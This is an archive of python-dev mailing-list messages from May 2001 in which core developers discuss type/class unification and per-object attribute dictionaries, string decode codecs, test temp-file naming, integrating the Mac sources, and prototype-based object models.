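        except AttributeError:
            pass
        entry = self._entries.get(id(obj))
        if entry is not None and name in entry[1]:
            return entry[1][name]
        raise AttributeError(name)

    def has_attr(self, obj, name):
        try:
            self.get_attr(obj, name)
        except AttributeError:
            return False
        return True


registry = AssociationRegistry()
n = 12345
registry.set_attr(n, "note", "annotated int")
print(registry.get_attr(n, "note"))     # annotated int
print(registry.get_attr(n, "real"))     # 12345 (found by ordinary lookup)
print(registry.has_attr(n, "missing"))  # False
```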


From guido at digicool.com  Fri May 11 03:57:36 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 20:57:36 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Thu, 10 May 2001 17:26:43 MST."
             <3AFB31C3.5CEF9064@ActiveState.com> 
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com>  
            <3AFB31C3.5CEF9064@ActiveState.com> 
Message-ID: <200105110157.UAA03123@cj20424-a.reston1.va.home.com>

> > Good point.  Plain old types currently (in the descr-branch) have a
> > readonly dict (using a proxy) and no settable attributes.  I will
> > probably give types settable attributes in a next revision, but I
> > prefer not to make the type's dict writable -- I need to be able to
> > watch the setattr calls so that if someone changes
> > DictType.__getitem__ I can change the mp_subscript to a C function
> > that calls the __getitem__ method.  
> 
> I'm happy to have you look and see if I'm setting something magical. But
> if I'm not, I would like you to just add the thing I made to an internal
> private dictionary and remember it. I think that's what you are talking
> about.

OK, we agree on this one.

> >...
> > If you're talking about *instances*: instances of subtypes of built-in
> > types have a dict of their own to which you can add stuff to your
> > heart's content.  Instances of built-in types will continue not to
> > have a dict (it would cost too much space if *every* object had a
> > dict, even if it was a NULL pointer when no attrs are defined).
> 
> Darn. That *is* what I was hoping for.
> 
> There is an implementation that is slowish if you use it, but has little
> cost if you don't: keep a big dict mapping object pointers to their
> associated dictionaries (if any). For purposes of discussion, call it
> sys._associations. Then have the getattr on "PyObject" look in this dict
> of dicts for attributes that it can't otherwise find, and setattr
> construct dictionaries in the dict of dicts if necessary.
> 
> That's the usual workaround anyhow, so this would give a nicer syntax and a
> more orthogonal model.
> 
> Price: a hasattr that would return false or getattr that would raise
> AttributeError would be a little slower. They would have to check the
> dictionary of dictionaries before deciding that they really don't have
> the attribute.

Personally, if you want this outrageous implementation, you should be
paying for it, not the infrastructure.  It feels contrary to Python's
treatment of objects.  I don't like elaborate workarounds in the
implementation like this -- probably because the performance model
becomes muddy.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From greg at cosc.canterbury.ac.nz  Fri May 11 03:05:11 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 11 May 2001 13:05:11 +1200 (NZST)
Subject: [Python-Dev] Type/class
In-Reply-To: <3AFB22A8.A0A6A4D4@ActiveState.com>
Message-ID: <200105110105.NAA17698@s454.cosc.canterbury.ac.nz>

Paul Prescod <paulp at ActiveState.com>:

> Otherwise
> they have null pointers that "act as if" they were empty
> dictionaries.

Actually, they need to act as if they were empty except for
a "__dict__" slot which contains another one of these magic
things. :-)

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From barry at digicool.com  Fri May 11 05:45:38 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Thu, 10 May 2001 23:45:38 -0400
Subject: [Python-Dev] Interview with Mark Lutz
Message-ID: <15099.24674.311472.184935@anthem.wooz.org>

Great interview with Mark on the ORA site, linked from /.

    http://python.oreilly.com/news/python_0501.html

-Barry


From fredrik at effbot.org  Fri May 11 07:57:34 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Fri, 11 May 2001 07:57:34 +0200
Subject: [Python-Dev] Interview with Mark Lutz
References: <15099.24674.311472.184935@anthem.wooz.org>
Message-ID: <022d01c0d9eb$d3e3d680$e46940d5@hagrid>

barry wrote:

> Great interview with Mark on the ORA site, linked from /.
> 
>     http://python.oreilly.com/news/python_0501.html

you mean that python-devers read slashdot for python news,
when you have the daily url:

    http://www.pythonware.com/daily

Cheers /F


From thomas at xs4all.net  Fri May 11 11:02:26 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Fri, 11 May 2001 11:02:26 +0200
Subject: [Python-Dev] Re: test_mmap failing?
In-Reply-To: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>; from fdrake@acm.org on Thu, May 10, 2001 at 10:57:59AM -0400
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com> <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>
Message-ID: <20010511110226.M16486@xs4all.nl>

On Thu, May 10, 2001 at 10:57:59AM -0400, Fred L. Drake, Jr. wrote:

[ Fred violates Tim's Rule #1 (don't ever use 'foo' for anything) and gets
  bitten in the derriere ]

>   This begs the question, though -- should tests that create temp
> files check that the files don't already exist, and fail with a more
> descriptive error if they do?

I'd think so, yes. I'd also suggest nothing uses something as lamenamed as
'foo', 'test' or 'spam' -- I'm sure Tim will agree with me, at least on the
first account :) How about mmap calls its test-testfile 'test_mmap.foo' ?
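One way a test could follow both suggestions, sketched for Python 3.3 or later: open the file in exclusive-creation mode ("x"), which raises FileExistsError if anything, including a leftover FIFO, already sits at that path, and turn that into a descriptive error. create_test_file is a hypothetical helper, not part of the test suite; the file name is the one Thomas suggests.

```python
import os
import tempfile


def create_test_file(path):
    """Create a new test file, refusing to reuse anything already at path."""
    try:
        # "x" means exclusive creation: FileExistsError if path exists.
        return open(path, "x+b")
    except FileExistsError:
        raise RuntimeError(
            "test file %r already exists (perhaps left over from an earlier "
            "run); remove it and rerun the test" % path
        ) from None


with tempfile.TemporaryDirectory() as tmp:
    path = os.path.join(tmp, "test_mmap.foo")
    with create_test_file(path) as f:
        f.write(b"\0" * 16)
    try:
        create_test_file(path)       # second attempt hits the leftover file
    except RuntimeError as exc:
        print(exc)
```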

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal at lemburg.com  Fri May 11 11:34:25 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 11 May 2001 11:34:25 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <3AFBB221.F29BCB9A@lemburg.com>

Michael Hudson wrote:
> 
> "M.-A. Lemburg" <mal at lemburg.com> writes:
> 
> > I've attached the patch. Due to a small reorganisation the patch is
> > a little longer -- symmetry has its price at C level too ;-)
> 
> I may be being dense, but can you explain what's going on here:
> 
> ->> u'\u00e3'.encode('latin-1')
> '\xe3'
> ->> u'\u00e3'.encode("latin-1").decode("latin-1")
> Traceback (most recent call last):
>   File "<input>", line 1, in ?
> UnicodeError: ASCII encoding error: ordinal not in range(128)

The string.decode() method will try to reuse the Unicode
codecs here. To do this, it will have to convert the string
to Unicode first and this fails due to the character not being
in the ASCII range.

> Can you come up with some other example I can use in tomorrow's
> python-dev summary?

I will add some codecs which make the .decode() method useful
next week. The ones I have in mind are base64, hex and some of
the other binascii codecs. Also, the ROT13 codec I posted will
go into the core as a simple example.

With those you will be able to write:

data.encode('base64').decode('base64')

and get back data.
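In Python 3 these transforms did end up in the standard library, but str.encode() and bytes.decode() are restricted to text encodings there, so binary-to-binary codecs such as base64 and hex, and the str-to-str rot13 codec, are reached through codecs.encode() and codecs.decode(). A minimal sketch of the round trip MAL describes:

```python
import codecs

data = b"spam"

encoded = codecs.encode(data, "base64")          # bytes -> base64 bytes
assert codecs.decode(encoded, "base64") == data  # and back again

print(codecs.encode(data, "hex"))      # b'7370616d'
print(codecs.encode("spam", "rot13"))  # fcnz (rot13 maps str to str)
```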

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik at effbot.org  Fri May 11 11:43:14 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Fri, 11 May 2001 11:43:14 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk> <3AFBB221.F29BCB9A@lemburg.com>
Message-ID: <049801c0d9fe$cd98aef0$e46940d5@hagrid>

mal wrote:

> > I may be being dense, but can you explain what's going on here:
> > 
> > ->> u'\u00e3'.encode('latin-1')
> > '\xe3'
> > ->> u'\u00e3'.encode("latin-1").decode("latin-1")
> > Traceback (most recent call last):
> >   File "<input>", line 1, in ?
> > UnicodeError: ASCII encoding error: ordinal not in range(128)
> 
> The string.decode() method will try to reuse the Unicode
> codecs here. To do this, it will have to convert the string
> to Unicode first and this fails due to the character not being
> in the ASCII range.

can you take that again?  shouldn't michael's example be
equivalent to:

    unicode(u"\u00e3".encode("latin-1"), "latin-1")

if not, I'd argue that your "decode" design is broken, instead
of just buggy...

Cheers /F


From mal at lemburg.com  Fri May 11 11:50:24 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 11 May 2001 11:50:24 +0200
Subject: [Python-Dev] Interview with Mark Lutz
References: <15099.24674.311472.184935@anthem.wooz.org> <022d01c0d9eb$d3e3d680$e46940d5@hagrid>
Message-ID: <3AFBB5E0.620710C8@lemburg.com>

Fredrik Lundh wrote:
> 
> barry wrote:
> 
> > Great interview with Mark on the ORA site, linked from /.
> >
> >     http://python.oreilly.com/news/python_0501.html
> 
> you mean that python-devers read slashdot for python news,
> when you have the daily url:
> 
>     http://www.pythonware.com/daily

I just bought one of those nice machines that can run pippy
and was wondering how to get AvantGo (the channel software that
comes with it) to synchronize with your daily URL... wouldn't it
be possible to setup a channel for this ? The AvantGo channels
can be registered at their site (http://www.avantgo.com), but the
contents would have to be "mobile friendly"... anyway, just a 
thought ;-)

-- 
Marc-Andre Lemburg


From mal at lemburg.com  Fri May 11 12:07:40 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 11 May 2001 12:07:40 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid>
Message-ID: <3AFBB9EC.F75C158D@lemburg.com>

Fredrik Lundh wrote:
> 
> mal wrote:
> 
> > > I may be being dense, but can you explain what's going on here:
> > >
> > > ->> u'\u00e3'.encode('latin-1')
> > > '\xe3'
> > > ->> u'\u00e3'.encode("latin-1").decode("latin-1")
> > > Traceback (most recent call last):
> > >   File "<input>", line 1, in ?
> > > UnicodeError: ASCII encoding error: ordinal not in range(128)
> >
> > The string.decode() method will try to reuse the Unicode
> > codecs here. To do this, it will have to convert the string
> > to Unicode first and this fails due to the character not being
> > in the ASCII range.
> 
> can you take that again?  shouldn't michael's example be
> equivalent to:
> 
>     unicode(u"\u00e3".encode("latin-1"), "latin-1")
> 
> if not, I'd argue that your "decode" design is broken, instead
> of just buggy...

Well, it is sort of broken, I agree. The reason is that 
PyString_Encode() and PyString_Decode() guarantee the returned
object to be a string object. To be able to reuse Unicode codecs
I added code which converts Unicode back to a string in case the
codec returns a Unicode object (which the .decode() method does).
This is what's failing.

Perhaps I should simply remove the restriction and have both
APIs return the codec's return object as-is ?! (I would be in
favour of this, but I'm not sure whether this is already in use 
by someone...)
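A small model of the failure MAL describes, in Python 3 terms. decode_coercing and decode_as_is are hypothetical helpers: the first mimics a contract that the result must be an 8-bit string, so a Unicode result is pushed back through ASCII (the default encoding in Python 2.1), and the second follows the proposal to return the codec's result unchanged.

```python
import codecs


def decode_coercing(data, encoding):
    """Hypothetical model of the restriction: the result must be bytes."""
    result = codecs.decode(data, encoding)
    if isinstance(result, str):
        # Convert a Unicode result back via ASCII; fails outside range(128).
        result = result.encode("ascii")
    return result


def decode_as_is(data, encoding):
    """Hypothetical model of the proposal: return what the codec produced."""
    return codecs.decode(data, encoding)


raw = "\u00e3".encode("latin-1")             # b'\xe3'
print(ascii(decode_as_is(raw, "latin-1")))  # '\xe3'
try:
    decode_coercing(raw, "latin-1")
except UnicodeEncodeError as exc:
    print("coercion failed:", exc.reason)   # ordinal not in range(128)
```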

-- 
Marc-Andre Lemburg


From guido at digicool.com  Fri May 11 15:31:18 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 11 May 2001 08:31:18 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Thu, 10 May 2001 20:57:36 EST."
             <200105110157.UAA03123@cj20424-a.reston1.va.home.com> 
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com> <3AFB31C3.5CEF9064@ActiveState.com>  
            <200105110157.UAA03123@cj20424-a.reston1.va.home.com> 
Message-ID: <200105111331.IAA04171@cj20424-a.reston1.va.home.com>

> > > Good point.  Plain old types currently (in the descr-branch) have a
> > > readonly dict (using a proxy) and no settable attributes.  I will
> > > probably give types settable attributes in a next revision, but I
> > > prefer not to make the type's dict writable -- I need to be able to
> > > watch the setattr calls so that if someone changes
> > > DictType.__getitem__ I can change the mp_subscript to a C function
> > > that calls the __getitem__ method.  

Alas, I think I'll have to withdraw this promise for now.  The truly
built-in types are static objects that are shared between all
interpreter instances within one process, and each type has only one
dictionary pointer.  So changes to the __dict__ would affect other
interpreter instances, and that's unacceptable.

I've thought about alternatives; I can't give each interpreter its own
set of types because sometimes objects are shared between interpreters
(e.g. the dictionary of interned strings), and then then their types
have to be shared too!  Not having any object sharing would mean too
much of a change to the foundations of the implementation.

I think we'll have to live with this restriction until Python 3000.
Personally, I don't mind -- I see mostly possible abuses for the
ability to change attributes of e.g. DictType or StringType. :-)
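The restriction is still visible today. In current CPython, assigning an attribute on a built-in type raises TypeError, while a class created with a class statement accepts new attributes. The sketch assumes Python 3; MyDict is an illustrative name, and the exact error message varies between versions.

```python
class MyDict(dict):
    """Created by a class statement, so its attributes are writable."""


try:
    dict.note = "visible to every user of dict"
except TypeError as exc:
    # The wording of this message differs between Python versions.
    print("TypeError:", exc)

MyDict.note = "fine on a subclass"
print(MyDict.note)            # fine on a subclass
print(hasattr(dict, "note"))  # False
```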

--Guido van Rossum (home page: http://www.python.org/~guido/)


From sdm7g at Virginia.EDU  Fri May 11 15:43:32 2001
From: sdm7g at Virginia.EDU (Steven D. Majewski)
Date: Fri, 11 May 2001 09:43:32 -0400 (EDT)
Subject: [Python-Dev] Type/class
In-Reply-To: <200105111331.IAA04171@cj20424-a.reston1.va.home.com>
Message-ID: <Pine.NXT.4.21.0105110919490.501-100000@localhost>


Catching up on this thread -- mostly because it looks like I'm
going to have to use ExtensionClass to make pyobjc classes into
python classes rather than types -- you can add that to the
list of real-world uses of Don's Metaclass hack that Tim
questioned.

 Reading up on MetaClasses in Smalltalk again makes me appreciate
the simplicity of a prototype system where everything is just
an object -- all objects can be cloned, and some objects are 
only used for cloning -- they are the exemplars of their type
which fill the role of Classes. 

 Unfortunately, although prototypes would be a lot simpler, it 
would be a pretty incompatible change for Python -- I can't think
of any way to get there without a lot of breakage. 

 (Still -- I wonder if there's a way they could be used under
the covers in the implementation to make it simpler. Prototype
semantics are basically a superset of Class based semantics, which
is how it was easy to do Smalltalk in Self.)

 Classes are necessary for statically typed O-O languages, but 
IMHO, make a lot less sense for dynamic languages. If Py3K were
to be a clean start, I'd urge basing it on prototypes, but as
an incremental creation -- I don't know how to get there from 
here (unless it could sneak in under the implementation covers!)
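A minimal prototype-style object in Python, to illustrate the idea rather than propose a design: every object can be cloned, lookups that miss locally fall through to the object it was cloned from, and an exemplar plays the role of a class. Proto and clone() are hypothetical names invented for this sketch.

```python
class Proto:
    """A minimal prototype object: local slots first, then the parent chain."""

    def __init__(self, parent=None, **slots):
        self._parent = parent        # the exemplar this object was cloned from
        self.__dict__.update(slots)  # slots set directly on this object

    def __getattr__(self, name):
        # Called only when normal lookup fails: delegate to the prototype.
        parent = self.__dict__.get("_parent")
        if parent is None:
            raise AttributeError(name)
        return getattr(parent, name)

    def clone(self, **slots):
        # A clone inherits everything it does not override itself.
        return Proto(self, **slots)


point = Proto(x=0, y=0)   # an exemplar playing the role of a "class"
p = point.clone(x=3)
print(p.x, p.y)           # 3 0
point.y = 10              # changes to the exemplar show through
print(p.y)                # 10
```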


 BTW: XlispStat, which has a prototype object system with multiple
inheritance, also doesn't have "super" -- there is a
(call-next-method [ args... ]) function/macro which searches for
the base classes. I'm sure there's a lower level function to
just get the next method, but typically, call-next-method is
what's used. There is no search for non-method attributes, as
all of the base class instance vars are merged and made into
slots of the instance itself. (There are no class variables --
there are no classes.)

 The closest python equivalent would be, as has been discussed
in this thread, a super method or function that does attribute
 lookup on the bases. 
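Python's later super(), combined with the C3 method resolution order introduced in Python 2.3, behaves much like call-next-method: each method defers to whatever comes next in the instance's MRO, which is not necessarily its own base class. A sketch with a diamond-shaped hierarchy, assuming Python 3 (class names are illustrative):

```python
class Base:
    def describe(self):
        return ["Base"]


class Left(Base):
    def describe(self):
        # Like call-next-method: defer to the next class in the MRO.
        return ["Left"] + super().describe()


class Right(Base):
    def describe(self):
        return ["Right"] + super().describe()


class Both(Left, Right):
    def describe(self):
        return ["Both"] + super().describe()


print(Both().describe())                   # ['Both', 'Left', 'Right', 'Base']
print([c.__name__ for c in Both.__mro__])  # ['Both', 'Left', 'Right', 'Base', 'object']
```

Note that on a Both instance, Left's super() call reaches Right rather than Base, which is what makes the chain cooperative.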


-- Steve Majewski


From nas at python.ca  Fri May 11 16:06:39 2001
From: nas at python.ca (Neil Schemenauer)
Date: Fri, 11 May 2001 07:06:39 -0700
Subject: [Python-Dev] Re: Change module attribute get & set
In-Reply-To: <E14yD4q-0001Au-00@usw-sf-web1.sourceforge.net>; from noreply@sourceforge.net on Fri, May 11, 2001 at 06:35:28AM -0700
References: <E14yD4q-0001Au-00@usw-sf-web1.sourceforge.net>
Message-ID: <20010511070639.A1402@glacier.fnational.com>

noreply at sourceforge.net wrote:
> Module objects currently don't define the tp_getattro 
> or tp_setattro slots.  As a result, interning of 
> attribute names does them no good:  a char* is always 
> passed, so the dict lookup always needs to do a string 
> compare despite that the attribute name is interned.

I think this is a problem in classobject.c:generic_binary_op as
well.  PyObject_GetAttrString is always used.  I believe the old
code interned names like "__add__" and used PyObject_GetAttr.  Is
it worth fixing this?
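A quick illustration of why interning helps, assuming Python 3's sys.intern(): an interned string is one shared object, so a dict lookup handed that object can match on a pointer comparison once the hashes agree, while a name rebuilt from a char* (as with PyObject_GetAttrString) is generally a fresh object that needs a character comparison. CPython's dict lookup checking identity before equality is an implementation detail, not a language guarantee.

```python
import sys

# Build the name at run time so it is normally a separate object from
# the "__add__" literal used below.
built = "".join(["__", "add", "__"])
canonical = sys.intern("__add__")

print(built == canonical)              # True: same characters
print(sys.intern(built) is canonical)  # True: interning returns the shared copy
```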

  Neil


From guido at digicool.com  Fri May 11 17:13:56 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 11 May 2001 10:13:56 -0500
Subject: [Python-Dev] Re: Change module attribute get & set
In-Reply-To: Your message of "Fri, 11 May 2001 07:06:39 MST."
             <20010511070639.A1402@glacier.fnational.com> 
References: <E14yD4q-0001Au-00@usw-sf-web1.sourceforge.net>  
            <20010511070639.A1402@glacier.fnational.com> 
Message-ID: <200105111513.KAA04872@cj20424-a.reston1.va.home.com>

> I think this is a problem in classobject.c:generic_binary_op as
> well.  PyObject_GetAttrString is always used.  I believe the old
> code interned names like "__add__" and used PyObject_GetAttr.  Is
> it worth fixing this?

Maybe.  I'd give this low priority.  If my descriptor branch work goes
well, most of classobject.c *may* disappear in favor of the newly
swollen typeobject.c. ;-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jack at oratrix.nl  Fri May 11 16:29:24 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Fri, 11 May 2001 16:29:24 +0200
Subject: [Python-Dev] Mac CVS repository moved to sourceforge
Message-ID: <20010511142924.C8037303181@snelboot.oratrix.nl>

Folks,
the Python/Mac repository has been moved to sourceforge, and is integrated 
with the general Python repository, so from now on a single CVS tree suffices 
to build MacPython.

I'm setting the old pythoncvs.oratrix.nl repository to readonly for a few more 
weeks and then it'll disappear.

Note that the pythoncvs.oratrix.nl repository is still the source for some of 
the optional libraries you need to build MacPython, but that's only if you 
want to build it completely from CVS.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From martin at loewis.home.cs.tu-berlin.de  Fri May 11 16:41:33 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Fri, 11 May 2001 16:41:33 +0200
Subject: [Python-Dev] Mac hierarchy backwards
Message-ID: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de>

First, thanks to Jack Jansen for integrating the Mac sources; this is
a good thing.

It seems, however, that some of the directory structure is backwards:
Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There
may be others of this kind.

I also wonder whether all these files are still needed, and meant to
be distributed. E.g. I see chdir.c having the comment

/* Chdir for the Macintosh.
   Public domain by Guido van Rossum, CWI, Amsterdam (July 1987).
   Pathnames must be Macintosh paths, with colons as separators. */

Is it really the case that the Mac API hasn't grown a chdir call in 13
years?

Regards,
Martin


From fdrake at acm.org  Fri May 11 16:55:33 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Fri, 11 May 2001 10:55:33 -0400 (EDT)
Subject: [Python-Dev] Mac hierarchy backwards
In-Reply-To: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de>
References: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de>
Message-ID: <15099.64869.626588.775895@cj42289-a.reston1.va.home.com>

Martin v. Loewis writes:
 > It seems, however, that some of the directory structure is backwards:
 > Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There
 > may be others of this kind.

  I agree that this should be the goal; I don't know if Jack's release
procedure would need to be revised before that can happen.  If so, I'd
encourage him to do so.

 > Is it really the case that the Mac API hasn't grown a chdir call in 13
 > years?

  Yikes!  I just searched developer.apple.com for "chdir" and came up
with no hits, but I really don't know just what that tells me.
chdir() is required for POSIX compliance, but it isn't mentioned in
the C9X final committee draft.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From jack at oratrix.nl  Fri May 11 16:56:39 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Fri, 11 May 2001 16:56:39 +0200
Subject: [Python-Dev] Mac hierarchy backwards 
In-Reply-To: Message by "Martin v. Loewis" <martin@loewis.home.cs.tu-berlin.de>
  ,
	     Fri, 11 May 2001 16:41:33 +0200 , <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> 
Message-ID: <20010511145640.9FCB5303181@snelboot.oratrix.nl>

> It seems, however, that some of the directory structure is backwards:
> Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There
> may be others of this kind.

Yes, now that the Mac stuff is integrated with the mainstream again this might 
be a good idea.

> I also wonder whether all these files are still needed, and meant to
> be distributed. E.g. I see chdir.c having the comment
> 
> /* Chdir for the Macintosh.
>    Public domain by Guido van Rossum, CWI, Amsterdam (July 1987).
>    Pathnames must be Macintosh paths, with colons as separators. */
> 
> Is it really the case that the Mac API hasn't grown a chdir call in 13
> years?

Hmm, hmm, I'm unsure.

MacOS (<= 9) itself doesn't have chdir, because it doesn't believe in current 
directories (by design. Whether I agree with the design is a different 
matter:-).

Normally MacPython is built with a special unix-compatibility library, GUSI, 
which does provide these calls. However, it is still possible to build without 
GUSI, and actually in the process of porting MacPython to Carbon ("MacOSX in 
its MacOS API model") I've used these compatibility routines again, until I 
finally got GUSI ported.

But it's easy enough to cvs-remove them from the normal tree, to be revived 
when needed. What do people think?
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From pedroni at inf.ethz.ch  Fri May 11 16:56:48 2001
From: pedroni at inf.ethz.ch (Samuele Pedroni)
Date: Fri, 11 May 2001 16:56:48 +0200 (MET DST)
Subject: [Python-Dev] Type/class
Message-ID: <200105111456.QAA00228@core.inf.ethz.ch>

Hi.

> 
>  Reading up on MetaClasses in Smalltalk again makes me appreciate
> the simplicity of a prototype system where everything is just
> an object -- all objects can be cloned, and some objects are 
> only used for cloning -- they are the exemplars of their type
> which fill the role of Classes. 
> 
I agree, I often read that Smalltalk is "simple" up to metaclasses,
on the other hand the casual user can just ignore them.

>  Unfortunately, although prototypes would be a lot simpler, it 
> would be a pretty incompatible change for Python -- I can't think
> of any way to get there without a lot of breakage. 
> 
>  (Still -- I wonder if there's a way they could be used under
> the covers in the implementation to make it simpler. Prototype
> semantics are basically a superset of Class based semantics, which
> is how it was easy to do Smalltalk in Self.)
> 
[Ignoring the fact that code and changes require coders]

Thinking in terms of proto-objects, parent slots and list parent slots:

a Python instance I has data slots and a parent slot __class__,

a Python class C has data slots and a list parent slot __bases__,

then we have the Python rules (not very uniform):
function found on I directly => plain function
function found via I.__class__ => bound method
function found on C => unbound method

That's the difficult part for every model that aims to remain compatible.
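The three lookup rules above can be observed directly. The following is a minimal sketch in modern Python 3 (names `greet`, `C`, `i` are hypothetical). One difference from the 2.x rules listed: Python 3 dropped unbound methods, so a function fetched from the class comes back as a plain function.

```python
def greet(self):
    return "hello"

class C:
    pass

C.method = greet   # function stored on the class
i = C()
i.attr = greet     # function stored directly on the instance

# Found directly in the instance's own slots: returned as a plain function, no binding.
print(type(i.attr).__name__)     # function
# Found via i.__class__: turned into a bound method that carries i as self.
print(type(i.method).__name__)   # method
print(i.method.__self__ is i)    # True
# Found on the class itself: Python 2.x returned an unbound method here,
# Python 3 returns the plain function.
print(type(C.method).__name__)   # function
```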

Samuele Pedroni.


From thomas.heller at ion-tof.com  Fri May 11 17:40:10 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Fri, 11 May 2001 17:40:10 +0200
Subject: [Python-Dev] Type/class
References: <Pine.NXT.4.21.0105110919490.501-100000@localhost>
Message-ID: <016d01c0da30$a99a9720$e000a8c0@thomasnotebook>

>  Reading up on MetaClasses in Smalltalk again makes me appreciate
> the simplicity of a prototype system where everything is just
> an object -- all objects can be cloned, and some objects are 
> only used for cloning -- they are the exemplars of their type
> which fill the role of Classes. 
> 
>  Unfortunately, although prototypes would be a lot simpler, it 
> would be a pretty incompatible change for Python -- I can't think
> of any way to get there without a lot of breakage. 
> 
>  (Still -- I wonder if there's a way they could be used under
> the covers in the implementation to make it simpler. Prototype
> semantics are basically a superset of Class based semantics, which
> is how it was easy to do Smalltalk in Self.)

I never looked at Self or other prototype based systems.
Is it really true that prototypes are a lot simpler than
metaclasses, but on the other hand more powerful?

The 'brain exploding properties' of metaclasses are IMO
only there because my brain cannot think easily in too
many recursion steps...

Thomas


From fdrake at acm.org  Fri May 11 18:25:54 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Fri, 11 May 2001 12:25:54 -0400 (EDT)
Subject: [Python-Dev] status of pre?
Message-ID: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com>

  Have we formulated a plan of action regarding PCRE and the pre
module?  Are we planning to leave them in for another version, or is
SRE considered sufficiently stable?


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From sdm7g at Virginia.EDU  Fri May 11 18:29:30 2001
From: sdm7g at Virginia.EDU (Steven D. Majewski)
Date: Fri, 11 May 2001 12:29:30 -0400 (EDT)
Subject: [Python-Dev] Mac hierarchy backwards
In-Reply-To: <15099.64869.626588.775895@cj42289-a.reston1.va.home.com>
Message-ID: <Pine.NXT.4.21.0105111130290.234-100000@localhost.virginia.edu>


On Fri, 11 May 2001, Fred L. Drake, Jr. wrote:
> 
> Martin v. Loewis writes:
>  > Is it really the case that the Mac API hasn't grown a chdir call in 13
>  > years?
> 
>   Yikes!  I just search developer.apple.com for "chdir" and came up
> with no hits, but I really don't know just what that tells me.
> chdir() is required for POSIX compliance, but it isn't mentioned in
> the C9X final committee draft.


 There isn't a chdir in any of the pre-OSX Mac *system* libraries, and
Mac has never claimed any POSIX compliance (even with OSX, they have
officially said it's almost certainly POSIX compliant but they have
no plans for now to go thru the hoops and paperwork to get it 
certified.) 

 chdir is in unistd.h, which isn't part of the standard C library.

 However, Metrowerks *compiler* and IDE for the Mac does include in
MSL (Metrowerks Standard Library) a unistd.[hc] with chdir. ( MW 
selling development tools obviously has more interest in being 
POSIX compliant than Apple! )


 I don't know if there's one in the MPW libraries, so maybe you
still want to leave it there. 

 -- Steve Majewski


From guido at digicool.com  Fri May 11 20:47:38 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 11 May 2001 13:47:38 -0500
